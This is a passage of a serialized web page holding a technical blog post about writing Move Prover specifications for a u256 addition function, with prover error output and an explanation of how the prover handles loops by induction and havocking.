",{"type":27,"tag":207,"props":17119,"children":17120},{"style":226},[17121],{"type":33,"value":9286},{"type":27,"tag":207,"props":17123,"children":17124},{"style":8920},[17125],{"type":33,"value":16936},{"type":27,"tag":207,"props":17127,"children":17128},{"style":226},[17129],{"type":33,"value":17093},{"type":27,"tag":207,"props":17131,"children":17132},{"style":8920},[17133],{"type":33,"value":16936},{"type":27,"tag":207,"props":17135,"children":17136},{"style":226},[17137],{"type":33,"value":17093},{"type":27,"tag":207,"props":17139,"children":17140},{"style":8920},[17141],{"type":33,"value":17142}," P64\n",{"type":27,"tag":207,"props":17144,"children":17145},{"class":209,"line":1475},[17146],{"type":27,"tag":207,"props":17147,"children":17148},{"style":238},[17149],{"type":33,"value":451},{"type":27,"tag":207,"props":17151,"children":17152},{"class":209,"line":2065},[17153],{"type":27,"tag":207,"props":17154,"children":17155},{"emptyLinePlaceholder":19},[17156],{"type":33,"value":2062},{"type":27,"tag":207,"props":17158,"children":17159},{"class":209,"line":2092},[17160,17164,17168],{"type":27,"tag":207,"props":17161,"children":17162},{"style":220},[17163],{"type":33,"value":15556},{"type":27,"tag":207,"props":17165,"children":17166},{"style":220},[17167],{"type":33,"value":16857},{"type":27,"tag":207,"props":17169,"children":17170},{"style":238},[17171],{"type":33,"value":384},{"type":27,"tag":207,"props":17173,"children":17174},{"class":209,"line":2130},[17175,17180,17184,17188,17192,17196,17200,17204,17208,17212,17216,17221,17225,17229,17233,17237,17241,17245,17249],{"type":27,"tag":207,"props":17176,"children":17177},{"style":220},[17178],{"type":33,"value":17179}," aborts_if",{"type":27,"tag":207,"props":17181,"children":17182},{"style":1335},[17183],{"type":33,"value":16980},{"type":27,"tag":207,"props":17185,"children":17186},{"style":238},[17187],{"type":33,"value":1343},{"type":27,"tag":207,"props":17189,"children":17190},{"style":220},[17191],{"type":33,"value":47},{"type":27,"tag":207,"props":17193,"children":17194},{"style":238},[17195],{"type":33,"value":2222},{"type":27,"tag":207,"props":17197,"children":17198},{"style":226},[17199],{"type":33,"value":2227},{"type":27,"tag":207,"props":17201,"children":17202},{"style":1335},[17203],{"type":33,"value":16980},{"type":27,"tag":207,"props":17205,"children":17206},{"style":238},[17207],{"type":33,"value":1343},{"type":27,"tag":207,"props":17209,"children":17210},{"style":220},[17211],{"type":33,"value":10512},{"type":27,"tag":207,"props":17213,"children":17214},{"style":238},[17215],{"type":33,"value":2222},{"type":27,"tag":207,"props":17217,"children":17218},{"style":226},[17219],{"type":33,"value":17220},">=",{"type":27,"tag":207,"props":17222,"children":17223},{"style":8920},[17224],{"type":33,"value":16936},{"type":27,"tag":207,"props":17226,"children":17227},{"style":226},[17228],{"type":33,"value":17093},{"type":27,"tag":207,"props":17230,"children":17231},{"style":8920},[17232],{"type":33,"value":16936},{"type":27,"tag":207,"props":17234,"children":17235},{"style":226},[17236],{"type":33,"value":17093},{"type":27,"tag":207,"props":17238,"children":17239},{"style":8920},[17240],{"type":33,"value":16936},{"type":27,"tag":207,"props":17242,"children":17243},{"style":226},[17244],{"type":33,"value":17093},{"type":27,"tag":207,"props":17246,"children":17247},{"style":8920},[17248],{"type":33,"value":16936},{"type":27,"tag":207,"props":17250,"children":17251},{"style":238},[17252],{"type":33,"value":241},{"type":27,"tag":207,"props":17254,"children":17255},{"class":209,"line":2168},[17256],{"type":27,"tag":207,"props":17257,"children":17258},{"style":238},[17259],{"type":33,"value":451},{"type":27,"tag":36,"props":17261,"children":17262},{},[17263,17265,17272],{"type":33,"value":17264},"We can observe in the snippet above, that we are allowed to call functions inside the spec block. However, the callee must either be an ",{"type":27,"tag":47,"props":17266,"children":17269},{"href":17267,"rel":17268},"https://github.com/move-language/move/blob/f7d5b1a3f4d622c17f540190fa4fa12323cb0bb8/language/move-prover/doc/user/spec-lang.md#builtin-functions",[51],[17270],{"type":33,"value":17271},"MSL function",{"type":33,"value":17273},", or a pure Move function. A pure Move function can be defined as a function that does not modify the global state or use Move expression features unsupported by MSL.",{"type":27,"tag":36,"props":17275,"children":17276},{},[17277,17279,17284,17285,17290],{"type":33,"value":17278},"A common pattern for ",{"type":27,"tag":84,"props":17280,"children":17282},{"className":17281},[],[17283],{"type":33,"value":15606},{"type":33,"value":12784},{"type":27,"tag":84,"props":17286,"children":17288},{"className":17287},[],[17289],{"type":33,"value":15614},{"type":33,"value":17291},", which lets you prove that a function will never abort.",{"type":27,"tag":101,"props":17293,"children":17295},{"code":17294,"language":10269,"meta":7,"className":10270,"style":7},"spec critical_function {\n aborts_if false;\n}\n",[17296],{"type":27,"tag":84,"props":17297,"children":17298},{"__ignoreMap":7},[17299,17315,17330],{"type":27,"tag":207,"props":17300,"children":17301},{"class":209,"line":210},[17302,17306,17311],{"type":27,"tag":207,"props":17303,"children":17304},{"style":220},[17305],{"type":33,"value":15556},{"type":27,"tag":207,"props":17307,"children":17308},{"style":220},[17309],{"type":33,"value":17310}," critical_function",{"type":27,"tag":207,"props":17312,"children":17313},{"style":238},[17314],{"type":33,"value":384},{"type":27,"tag":207,"props":17316,"children":17317},{"class":209,"line":244},[17318,17322,17326],{"type":27,"tag":207,"props":17319,"children":17320},{"style":220},[17321],{"type":33,"value":17179},{"type":27,"tag":207,"props":17323,"children":17324},{"style":214},[17325],{"type":33,"value":16337},{"type":27,"tag":207,"props":17327,"children":17328},{"style":238},[17329],{"type":33,"value":241},{"type":27,"tag":207,"props":17331,"children":17332},{"class":209,"line":270},[17333],{"type":27,"tag":207,"props":17334,"children":17335},{"style":238},[17336],{"type":33,"value":451},{"type":27,"tag":36,"props":17338,"children":17339},{},[17340,17342,17348],{"type":33,"value":17341},"Another type of expression that we can use is ",{"type":27,"tag":84,"props":17343,"children":17345},{"className":17344},[],[17346],{"type":33,"value":17347},"ensures",{"type":33,"value":17349},". As the name suggests, it ensures that a certain condition is true at the end of a function's execution.",{"type":27,"tag":36,"props":17351,"children":17352},{},[17353,17355,17360,17362,17367],{"type":33,"value":17354},"In the case of the ",{"type":27,"tag":84,"props":17356,"children":17358},{"className":17357},[],[17359],{"type":33,"value":16914},{"type":33,"value":17361}," function, we want to ensure that the return value is the sum of the 2 parameters. Note that because ",{"type":27,"tag":12606,"props":17363,"children":17364},{},[17365],{"type":33,"value":17366},"MSL uses unbounded numbers",{"type":33,"value":17368},", we're able to very cleanly express this property without worrying about overflows.",{"type":27,"tag":101,"props":17370,"children":17372},{"code":17371,"language":10269,"meta":7,"className":10270,"style":7},"spec add {\n aborts_if value_of_U256(a) + value_of_U256(b) >= P64 * P64 * P64 * P64;\n ensures value_of_U256(result) == value_of_U256(a) + value_of_U256(b);\n}\n",[17373],{"type":27,"tag":84,"props":17374,"children":17375},{"__ignoreMap":7},[17376,17391,17470,17534],{"type":27,"tag":207,"props":17377,"children":17378},{"class":209,"line":210},[17379,17383,17387],{"type":27,"tag":207,"props":17380,"children":17381},{"style":220},[17382],{"type":33,"value":15556},{"type":27,"tag":207,"props":17384,"children":17385},{"style":220},[17386],{"type":33,"value":16857},{"type":27,"tag":207,"props":17388,"children":17389},{"style":238},[17390],{"type":33,"value":384},{"type":27,"tag":207,"props":17392,"children":17393},{"class":209,"line":244},[17394,17398,17402,17406,17410,17414,17418,17422,17426,17430,17434,17438,17442,17446,17450,17454,17458,17462,17466],{"type":27,"tag":207,"props":17395,"children":17396},{"style":220},[17397],{"type":33,"value":17179},{"type":27,"tag":207,"props":17399,"children":17400},{"style":1335},[17401],{"type":33,"value":16980},{"type":27,"tag":207,"props":17403,"children":17404},{"style":238},[17405],{"type":33,"value":1343},{"type":27,"tag":207,"props":17407,"children":17408},{"style":220},[17409],{"type":33,"value":47},{"type":27,"tag":207,"props":17411,"children":17412},{"style":238},[17413],{"type":33,"value":2222},{"type":27,"tag":207,"props":17415,"children":17416},{"style":226},[17417],{"type":33,"value":2227},{"type":27,"tag":207,"props":17419,"children":17420},{"style":1335},[17421],{"type":33,"value":16980},{"type":27,"tag":207,"props":17423,"children":17424},{"style":238},[17425],{"type":33,"value":1343},{"type":27,"tag":207,"props":17427,"children":17428},{"style":220},[17429],{"type":33,"value":10512},{"type":27,"tag":207,"props":17431,"children":17432},{"style":238},[17433],{"type":33,"value":2222},{"type":27,"tag":207,"props":17435,"children":17436},{"style":226},[17437],{"type":33,"value":17220},{"type":27,"tag":207,"props":17439,"children":17440},{"style":8920},[17441],{"type":33,"value":16936},{"type":27,"tag":207,"props":17443,"children":17444},{"style":226},[17445],{"type":33,"value":17093},{"type":27,"tag":207,"props":17447,"children":17448},{"style":8920},[17449],{"type":33,"value":16936},{"type":27,"tag":207,"props":17451,"children":17452},{"style":226},[17453],{"type":33,"value":17093},{"type":27,"tag":207,"props":17455,"children":17456},{"style":8920},[17457],{"type":33,"value":16936},{"type":27,"tag":207,"props":17459,"children":17460},{"style":226},[17461],{"type":33,"value":17093},{"type":27,"tag":207,"props":17463,"children":17464},{"style":8920},[17465],{"type":33,"value":16936},{"type":27,"tag":207,"props":17467,"children":17468},{"style":238},[17469],{"type":33,"value":241},{"type":27,"tag":207,"props":17471,"children":17472},{"class":209,"line":270},[17473,17478,17482,17486,17490,17494,17498,17502,17506,17510,17514,17518,17522,17526,17530],{"type":27,"tag":207,"props":17474,"children":17475},{"style":220},[17476],{"type":33,"value":17477}," ensures",{"type":27,"tag":207,"props":17479,"children":17480},{"style":1335},[17481],{"type":33,"value":16980},{"type":27,"tag":207,"props":17483,"children":17484},{"style":238},[17485],{"type":33,"value":1343},{"type":27,"tag":207,"props":17487,"children":17488},{"style":220},[17489],{"type":33,"value":4242},{"type":27,"tag":207,"props":17491,"children":17492},{"style":238},[17493],{"type":33,"value":2222},{"type":27,"tag":207,"props":17495,"children":17496},{"style":226},[17497],{"type":33,"value":15856},{"type":27,"tag":207,"props":17499,"children":17500},{"style":1335},[17501],{"type":33,"value":16980},{"type":27,"tag":207,"props":17503,"children":17504},{"style":238},[17505],{"type":33,"value":1343},{"type":27,"tag":207,"props":17507,"children":17508},{"style":220},[17509],{"type":33,"value":47},{"type":27,"tag":207,"props":17511,"children":17512},{"style":238},[17513],{"type":33,"value":2222},{"type":27,"tag":207,"props":17515,"children":17516},{"style":226},[17517],{"type":33,"value":2227},{"type":27,"tag":207,"props":17519,"children":17520},{"style":1335},[17521],{"type":33,"value":16980},{"type":27,"tag":207,"props":17523,"children":17524},{"style":238},[17525],{"type":33,"value":1343},{"type":27,"tag":207,"props":17527,"children":17528},{"style":220},[17529],{"type":33,"value":10512},{"type":27,"tag":207,"props":17531,"children":17532},{"style":238},[17533],{"type":33,"value":1455},{"type":27,"tag":207,"props":17535,"children":17536},{"class":209,"line":296},[17537],{"type":27,"tag":207,"props":17538,"children":17539},{"style":238},[17540],{"type":33,"value":451},{"type":27,"tag":36,"props":17542,"children":17543},{},[17544],{"type":33,"value":17545},"Note that because Move specification functions are written in MSL, the numbers are unbounded and we can define the expression without risk of overflow.",{"type":27,"tag":36,"props":17547,"children":17548},{},[17549],{"type":33,"value":17550},"Let's try to prove the library with the specifications from above:",{"type":27,"tag":101,"props":17552,"children":17554},{"code":17553,"language":11526,"meta":7,"className":11527,"style":7},"$ move prove\n",[17555],{"type":27,"tag":84,"props":17556,"children":17557},{"__ignoreMap":7},[17558],{"type":27,"tag":207,"props":17559,"children":17560},{"class":209,"line":210},[17561,17566,17571],{"type":27,"tag":207,"props":17562,"children":17563},{"style":1335},[17564],{"type":33,"value":17565},"$",{"type":27,"tag":207,"props":17567,"children":17568},{"style":1325},[17569],{"type":33,"value":17570}," move",{"type":27,"tag":207,"props":17572,"children":17573},{"style":1325},[17574],{"type":33,"value":17575}," prove\n",{"type":27,"tag":36,"props":17577,"children":17578},{},[17579],{"type":33,"value":17580},"It outputs the following error information:",{"type":27,"tag":101,"props":17582,"children":17584},{"code":17583,"language":11526,"meta":7,"className":11527,"style":7},"[...]\n\nerror: abort not covered by any of the `aborts_if` clauses\n╭ spec add {\n| aborts_if value_of_U256(a) + value_of_U256(b) >= P64 * P64 * P64 * P64;\n| ensures value_of_U256(result) == value_of_U256(a) + value_of_U256(b);\n| }\n╰─────^\n\n[...]\n\n at ./sources/u256.move:316: add\n enter loop, variable(s) carry, i, ret havocked and reassigned\n carry = 54\n i = 3792\n ret = u256.U256{v0 = 26418, v1 = 27938, v2 = 6900, v3 = 1999}\n at ./sources/u256.move:346: add\n ABORTED\n\nFAILURE proving 1 modules from package `u256` in 9.143s\n{\n \"Error\": \"Move Prover failed: exiting with verification errors\"\n}\n",[17585],{"type":27,"tag":84,"props":17586,"children":17587},{"__ignoreMap":7},[17588,17596,17603,17665,17686,17776,17844,17856,17864,17871,17878,17885,17903,17964,17981,17998,18070,18086,18094,18101,18151,18159,18176],{"type":27,"tag":207,"props":17589,"children":17590},{"class":209,"line":210},[17591],{"type":27,"tag":207,"props":17592,"children":17593},{"style":238},[17594],{"type":33,"value":17595},"[...]\n",{"type":27,"tag":207,"props":17597,"children":17598},{"class":209,"line":244},[17599],{"type":27,"tag":207,"props":17600,"children":17601},{"emptyLinePlaceholder":19},[17602],{"type":33,"value":2062},{"type":27,"tag":207,"props":17604,"children":17605},{"class":209,"line":270},[17606,17611,17616,17621,17626,17631,17636,17641,17646,17651,17655,17660],{"type":27,"tag":207,"props":17607,"children":17608},{"style":1335},[17609],{"type":33,"value":17610},"error:",{"type":27,"tag":207,"props":17612,"children":17613},{"style":1325},[17614],{"type":33,"value":17615}," abort",{"type":27,"tag":207,"props":17617,"children":17618},{"style":1325},[17619],{"type":33,"value":17620}," not",{"type":27,"tag":207,"props":17622,"children":17623},{"style":1325},[17624],{"type":33,"value":17625}," covered",{"type":27,"tag":207,"props":17627,"children":17628},{"style":1325},[17629],{"type":33,"value":17630}," by",{"type":27,"tag":207,"props":17632,"children":17633},{"style":1325},[17634],{"type":33,"value":17635}," any",{"type":27,"tag":207,"props":17637,"children":17638},{"style":1325},[17639],{"type":33,"value":17640}," of",{"type":27,"tag":207,"props":17642,"children":17643},{"style":1325},[17644],{"type":33,"value":17645}," the",{"type":27,"tag":207,"props":17647,"children":17648},{"style":1325},[17649],{"type":33,"value":17650}," `",{"type":27,"tag":207,"props":17652,"children":17653},{"style":1335},[17654],{"type":33,"value":15606},{"type":27,"tag":207,"props":17656,"children":17657},{"style":1325},[17658],{"type":33,"value":17659},"`",{"type":27,"tag":207,"props":17661,"children":17662},{"style":1335},[17663],{"type":33,"value":17664}," clauses\n",{"type":27,"tag":207,"props":17666,"children":17667},{"class":209,"line":296},[17668,17673,17678,17682],{"type":27,"tag":207,"props":17669,"children":17670},{"style":1335},[17671],{"type":33,"value":17672},"╭",{"type":27,"tag":207,"props":17674,"children":17675},{"style":1325},[17676],{"type":33,"value":17677}," spec",{"type":27,"tag":207,"props":17679,"children":17680},{"style":1325},[17681],{"type":33,"value":16857},{"type":27,"tag":207,"props":17683,"children":17684},{"style":1325},[17685],{"type":33,"value":384},{"type":27,"tag":207,"props":17687,"children":17688},{"class":209,"line":445},[17689,17694,17699,17703,17707,17711,17715,17719,17723,17727,17731,17735,17740,17744,17748,17752,17756,17760,17764,17768,17772],{"type":27,"tag":207,"props":17690,"children":17691},{"style":226},[17692],{"type":33,"value":17693},"|",{"type":27,"tag":207,"props":17695,"children":17696},{"style":1335},[17697],{"type":33,"value":17698}," aborts_if",{"type":27,"tag":207,"props":17700,"children":17701},{"style":1325},[17702],{"type":33,"value":16980},{"type":27,"tag":207,"props":17704,"children":17705},{"style":238},[17706],{"type":33,"value":1343},{"type":27,"tag":207,"props":17708,"children":17709},{"style":1335},[17710],{"type":33,"value":47},{"type":27,"tag":207,"props":17712,"children":17713},{"style":238},[17714],{"type":33,"value":2222},{"type":27,"tag":207,"props":17716,"children":17717},{"style":1325},[17718],{"type":33,"value":2227},{"type":27,"tag":207,"props":17720,"children":17721},{"style":1325},[17722],{"type":33,"value":16980},{"type":27,"tag":207,"props":17724,"children":17725},{"style":238},[17726],{"type":33,"value":1343},{"type":27,"tag":207,"props":17728,"children":17729},{"style":1335},[17730],{"type":33,"value":10512},{"type":27,"tag":207,"props":17732,"children":17733},{"style":238},[17734],{"type":33,"value":2222},{"type":27,"tag":207,"props":17736,"children":17737},{"style":226},[17738],{"type":33,"value":17739},">",{"type":27,"tag":207,"props":17741,"children":17742},{"style":1325},[17743],{"type":33,"value":10380},{"type":27,"tag":207,"props":17745,"children":17746},{"style":1325},[17747],{"type":33,"value":16936},{"type":27,"tag":207,"props":17749,"children":17750},{"style":214},[17751],{"type":33,"value":17093},{"type":27,"tag":207,"props":17753,"children":17754},{"style":1325},[17755],{"type":33,"value":16936},{"type":27,"tag":207,"props":17757,"children":17758},{"style":214},[17759],{"type":33,"value":17093},{"type":27,"tag":207,"props":17761,"children":17762},{"style":1325},[17763],{"type":33,"value":16936},{"type":27,"tag":207,"props":17765,"children":17766},{"style":214},[17767],{"type":33,"value":17093},{"type":27,"tag":207,"props":17769,"children":17770},{"style":1325},[17771],{"type":33,"value":16936},{"type":27,"tag":207,"props":17773,"children":17774},{"style":238},[17775],{"type":33,"value":241},{"type":27,"tag":207,"props":17777,"children":17778},{"class":209,"line":867},[17779,17783,17788,17792,17796,17800,17804,17808,17812,17816,17820,17824,17828,17832,17836,17840],{"type":27,"tag":207,"props":17780,"children":17781},{"style":226},[17782],{"type":33,"value":17693},{"type":27,"tag":207,"props":17784,"children":17785},{"style":1335},[17786],{"type":33,"value":17787}," ensures",{"type":27,"tag":207,"props":17789,"children":17790},{"style":1325},[17791],{"type":33,"value":16980},{"type":27,"tag":207,"props":17793,"children":17794},{"style":238},[17795],{"type":33,"value":1343},{"type":27,"tag":207,"props":17797,"children":17798},{"style":1335},[17799],{"type":33,"value":4242},{"type":27,"tag":207,"props":17801,"children":17802},{"style":238},[17803],{"type":33,"value":2222},{"type":27,"tag":207,"props":17805,"children":17806},{"style":1325},[17807],{"type":33,"value":15856},{"type":27,"tag":207,"props":17809,"children":17810},{"style":1325},[17811],{"type":33,"value":16980},{"type":27,"tag":207,"props":17813,"children":17814},{"style":238},[17815],{"type":33,"value":1343},{"type":27,"tag":207,"props":17817,"children":17818},{"style":1335},[17819],{"type":33,"value":47},{"type":27,"tag":207,"props":17821,"children":17822},{"style":238},[17823],{"type":33,"value":2222},{"type":27,"tag":207,"props":17825,"children":17826},{"style":1325},[17827],{"type":33,"value":2227},{"type":27,"tag":207,"props":17829,"children":17830},{"style":1325},[17831],{"type":33,"value":16980},{"type":27,"tag":207,"props":17833,"children":17834},{"style":238},[17835],{"type":33,"value":1343},{"type":27,"tag":207,"props":17837,"children":17838},{"style":1335},[17839],{"type":33,"value":10512},{"type":27,"tag":207,"props":17841,"children":17842},{"style":238},[17843],{"type":33,"value":1455},{"type":27,"tag":207,"props":17845,"children":17846},{"class":209,"line":892},[17847,17851],{"type":27,"tag":207,"props":17848,"children":17849},{"style":226},[17850],{"type":33,"value":17693},{"type":27,"tag":207,"props":17852,"children":17853},{"style":238},[17854],{"type":33,"value":17855}," }\n",{"type":27,"tag":207,"props":17857,"children":17858},{"class":209,"line":1475},[17859],{"type":27,"tag":207,"props":17860,"children":17861},{"style":1335},[17862],{"type":33,"value":17863},"╰─────^\n",{"type":27,"tag":207,"props":17865,"children":17866},{"class":209,"line":2065},[17867],{"type":27,"tag":207,"props":17868,"children":17869},{"emptyLinePlaceholder":19},[17870],{"type":33,"value":2062},{"type":27,"tag":207,"props":17872,"children":17873},{"class":209,"line":2092},[17874],{"type":27,"tag":207,"props":17875,"children":17876},{"style":238},[17877],{"type":33,"value":17595},{"type":27,"tag":207,"props":17879,"children":17880},{"class":209,"line":2130},[17881],{"type":27,"tag":207,"props":17882,"children":17883},{"emptyLinePlaceholder":19},[17884],{"type":33,"value":2062},{"type":27,"tag":207,"props":17886,"children":17887},{"class":209,"line":2168},[17888,17893,17898],{"type":27,"tag":207,"props":17889,"children":17890},{"style":1335},[17891],{"type":33,"value":17892}," at",{"type":27,"tag":207,"props":17894,"children":17895},{"style":1325},[17896],{"type":33,"value":17897}," ./sources/u256.move:316:",{"type":27,"tag":207,"props":17899,"children":17900},{"style":1325},[17901],{"type":33,"value":17902}," add\n",{"type":27,"tag":207,"props":17904,"children":17905},{"class":209,"line":4095},[17906,17911,17916,17921,17925,17930,17934,17939,17944,17949,17954,17959],{"type":27,"tag":207,"props":17907,"children":17908},{"style":1335},[17909],{"type":33,"value":17910}," enter",{"type":27,"tag":207,"props":17912,"children":17913},{"style":1325},[17914],{"type":33,"value":17915}," loop,",{"type":27,"tag":207,"props":17917,"children":17918},{"style":1325},[17919],{"type":33,"value":17920}," variable",{"type":27,"tag":207,"props":17922,"children":17923},{"style":238},[17924],{"type":33,"value":1343},{"type":27,"tag":207,"props":17926,"children":17927},{"style":1335},[17928],{"type":33,"value":17929},"s",{"type":27,"tag":207,"props":17931,"children":17932},{"style":238},[17933],{"type":33,"value":2222},{"type":27,"tag":207,"props":17935,"children":17936},{"style":1325},[17937],{"type":33,"value":17938},"carry,",{"type":27,"tag":207,"props":17940,"children":17941},{"style":1325},[17942],{"type":33,"value":17943}," i,",{"type":27,"tag":207,"props":17945,"children":17946},{"style":1325},[17947],{"type":33,"value":17948}," ret",{"type":27,"tag":207,"props":17950,"children":17951},{"style":1325},[17952],{"type":33,"value":17953}," havocked",{"type":27,"tag":207,"props":17955,"children":17956},{"style":1325},[17957],{"type":33,"value":17958}," and",{"type":27,"tag":207,"props":17960,"children":17961},{"style":1325},[17962],{"type":33,"value":17963}," reassigned\n",{"type":27,"tag":207,"props":17965,"children":17966},{"class":209,"line":4103},[17967,17972,17976],{"type":27,"tag":207,"props":17968,"children":17969},{"style":1335},[17970],{"type":33,"value":17971}," carry",{"type":27,"tag":207,"props":17973,"children":17974},{"style":1325},[17975],{"type":33,"value":229},{"type":27,"tag":207,"props":17977,"children":17978},{"style":232},[17979],{"type":33,"value":17980}," 54\n",{"type":27,"tag":207,"props":17982,"children":17983},{"class":209,"line":4154},[17984,17989,17993],{"type":27,"tag":207,"props":17985,"children":17986},{"style":1335},[17987],{"type":33,"value":17988}," i",{"type":27,"tag":207,"props":17990,"children":17991},{"style":1325},[17992],{"type":33,"value":229},{"type":27,"tag":207,"props":17994,"children":17995},{"style":232},[17996],{"type":33,"value":17997}," 3792\n",{"type":27,"tag":207,"props":17999,"children":18000},{"class":209,"line":4203},[18001,18006,18010,18015,18019,18024,18029,18033,18038,18043,18047,18052,18057,18061,18066],{"type":27,"tag":207,"props":18002,"children":18003},{"style":1335},[18004],{"type":33,"value":18005}," ret",{"type":27,"tag":207,"props":18007,"children":18008},{"style":1325},[18009],{"type":33,"value":229},{"type":27,"tag":207,"props":18011,"children":18012},{"style":1325},[18013],{"type":33,"value":18014}," u256.U256{v0",{"type":27,"tag":207,"props":18016,"children":18017},{"style":1325},[18018],{"type":33,"value":229},{"type":27,"tag":207,"props":18020,"children":18021},{"style":1325},[18022],{"type":33,"value":18023}," 26418,",{"type":27,"tag":207,"props":18025,"children":18026},{"style":1325},[18027],{"type":33,"value":18028}," v1",{"type":27,"tag":207,"props":18030,"children":18031},{"style":1325},[18032],{"type":33,"value":229},{"type":27,"tag":207,"props":18034,"children":18035},{"style":1325},[18036],{"type":33,"value":18037}," 27938,",{"type":27,"tag":207,"props":18039,"children":18040},{"style":1325},[18041],{"type":33,"value":18042}," v2",{"type":27,"tag":207,"props":18044,"children":18045},{"style":1325},[18046],{"type":33,"value":229},{"type":27,"tag":207,"props":18048,"children":18049},{"style":1325},[18050],{"type":33,"value":18051}," 6900,",{"type":27,"tag":207,"props":18053,"children":18054},{"style":1325},[18055],{"type":33,"value":18056}," v3",{"type":27,"tag":207,"props":18058,"children":18059},{"style":1325},[18060],{"type":33,"value":229},{"type":27,"tag":207,"props":18062,"children":18063},{"style":232},[18064],{"type":33,"value":18065}," 1999",{"type":27,"tag":207,"props":18067,"children":18068},{"style":1325},[18069],{"type":33,"value":451},{"type":27,"tag":207,"props":18071,"children":18072},{"class":209,"line":4249},[18073,18077,18082],{"type":27,"tag":207,"props":18074,"children":18075},{"style":1335},[18076],{"type":33,"value":17892},{"type":27,"tag":207,"props":18078,"children":18079},{"style":1325},[18080],{"type":33,"value":18081}," ./sources/u256.move:346:",{"type":27,"tag":207,"props":18083,"children":18084},{"style":1325},[18085],{"type":33,"value":17902},{"type":27,"tag":207,"props":18087,"children":18088},{"class":209,"line":4290},[18089],{"type":27,"tag":207,"props":18090,"children":18091},{"style":1335},[18092],{"type":33,"value":18093}," ABORTED\n",{"type":27,"tag":207,"props":18095,"children":18096},{"class":209,"line":4304},[18097],{"type":27,"tag":207,"props":18098,"children":18099},{"emptyLinePlaceholder":19},[18100],{"type":33,"value":2062},{"type":27,"tag":207,"props":18102,"children":18103},{"class":209,"line":5466},[18104,18109,18114,18118,18123,18128,18133,18137,18142,18146],{"type":27,"tag":207,"props":18105,"children":18106},{"style":1335},[18107],{"type":33,"value":18108},"FAILURE",{"type":27,"tag":207,"props":18110,"children":18111},{"style":1325},[18112],{"type":33,"value":18113}," proving",{"type":27,"tag":207,"props":18115,"children":18116},{"style":232},[18117],{"type":33,"value":235},{"type":27,"tag":207,"props":18119,"children":18120},{"style":1325},[18121],{"type":33,"value":18122}," modules",{"type":27,"tag":207,"props":18124,"children":18125},{"style":1325},[18126],{"type":33,"value":18127}," from",{"type":27,"tag":207,"props":18129,"children":18130},{"style":1325},[18131],{"type":33,"value":18132}," package",{"type":27,"tag":207,"props":18134,"children":18135},{"style":1325},[18136],{"type":33,"value":17650},{"type":27,"tag":207,"props":18138,"children":18139},{"style":1335},[18140],{"type":33,"value":18141},"u256",{"type":27,"tag":207,"props":18143,"children":18144},{"style":1325},[18145],{"type":33,"value":17659},{"type":27,"tag":207,"props":18147,"children":18148},{"style":238},[18149],{"type":33,"value":18150}," in 9.143s\n",{"type":27,"tag":207,"props":18152,"children":18153},{"class":209,"line":5530},[18154],{"type":27,"tag":207,"props":18155,"children":18156},{"style":238},[18157],{"type":33,"value":18158},"{\n",{"type":27,"tag":207,"props":18160,"children":18161},{"class":209,"line":7900},[18162,18167,18171],{"type":27,"tag":207,"props":18163,"children":18164},{"style":1335},[18165],{"type":33,"value":18166}," \"Error\"",{"type":27,"tag":207,"props":18168,"children":18169},{"style":1335},[18170],{"type":33,"value":736},{"type":27,"tag":207,"props":18172,"children":18173},{"style":1325},[18174],{"type":33,"value":18175}," \"Move Prover failed: exiting with verification errors\"\n",{"type":27,"tag":207,"props":18177,"children":18178},{"class":209,"line":7909},[18179],{"type":27,"tag":207,"props":18180,"children":18181},{"style":238},[18182],{"type":33,"value":451},{"type":27,"tag":36,"props":18184,"children":18185},{},[18186,18188,18193],{"type":33,"value":18187},"The prover is telling us that proving failed because the abort was not covered by our ",{"type":27,"tag":84,"props":18189,"children":18191},{"className":18190},[],[18192],{"type":33,"value":15606},{"type":33,"value":18194}," clauses. But there is no other abort situation that we have to cover, right?",{"type":27,"tag":36,"props":18196,"children":18197},{},[18198,18200,18206],{"type":33,"value":18199},"If we keep reading the error output, we will encounter the somewhat cryptic message: ",{"type":27,"tag":84,"props":18201,"children":18203},{"className":18202},[],[18204],{"type":33,"value":18205},"ret havocked and reassigned",{"type":33,"value":1041},{"type":27,"tag":36,"props":18208,"children":18209},{},[18210],{"type":33,"value":18211},"What does this mean?",{"type":27,"tag":36,"props":18213,"children":18214},{},[18215,18217,18224],{"type":33,"value":18216},"By diving into the Move Prover source, we find a ",{"type":27,"tag":47,"props":18218,"children":18221},{"href":18219,"rel":18220},"https://github.com/move-language/move/blob/e0dafc5cf3efe4c4e61411f10cdf0f379a36673c/language/move-prover/bytecode/src/loop_analysis.rs#L94",[51],[18222],{"type":33,"value":18223},"likely suspect",{"type":33,"value":18225},". The prover attempts to prove all loops with induction!",{"type":27,"tag":36,"props":18227,"children":18228},{},[18229],{"type":33,"value":18230},"More formally, it will translate the loop into two key steps, following the classic steps of a proof by induction",{"type":27,"tag":12719,"props":18232,"children":18233},{},[18234,18239],{"type":27,"tag":1232,"props":18235,"children":18236},{},[18237],{"type":33,"value":18238},"Base Case: Asserting the loop invariant holds at the start of loop execution",{"type":27,"tag":1232,"props":18240,"children":18241},{},[18242],{"type":33,"value":18243},"Inductive Step: Assume the invariant, execute the loop body, and assert that the invariant still holds",{"type":27,"tag":36,"props":18245,"children":18246},{},[18247,18249,18254,18256,18262,18263,18269,18270,18275,18277,18282],{"type":33,"value":18248},"The loop prover will also ",{"type":27,"tag":12606,"props":18250,"children":18251},{},[18252],{"type":33,"value":18253},"havoc, or assign random values to, all variables written to inside the loop",{"type":33,"value":18255},". Going back to the log message, this implies that the variables ",{"type":27,"tag":84,"props":18257,"children":18259},{"className":18258},[],[18260],{"type":33,"value":18261},"carry",{"type":33,"value":1123},{"type":27,"tag":84,"props":18264,"children":18266},{"className":18265},[],[18267],{"type":33,"value":18268},"ret",{"type":33,"value":1131},{"type":27,"tag":84,"props":18271,"children":18273},{"className":18272},[],[18274],{"type":33,"value":4690},{"type":33,"value":18276}," have been havocked, or assigned random values. This also explains why the input and output of ",{"type":27,"tag":84,"props":18278,"children":18280},{"className":18279},[],[18281],{"type":33,"value":16914},{"type":33,"value":18283}," makes no sense.",{"type":27,"tag":36,"props":18285,"children":18286},{},[18287],{"type":33,"value":18288},"More concretely, the loop analysis translates into the following steps.",{"type":27,"tag":12719,"props":18290,"children":18291},{},[18292,18297,18302,18307,18312,18317],{"type":27,"tag":1232,"props":18293,"children":18294},{},[18295],{"type":33,"value":18296},"Assert the loop invariant",{"type":27,"tag":1232,"props":18298,"children":18299},{},[18300],{"type":33,"value":18301},"Havoc all modified variables",{"type":27,"tag":1232,"props":18303,"children":18304},{},[18305],{"type":33,"value":18306},"Assume the loop 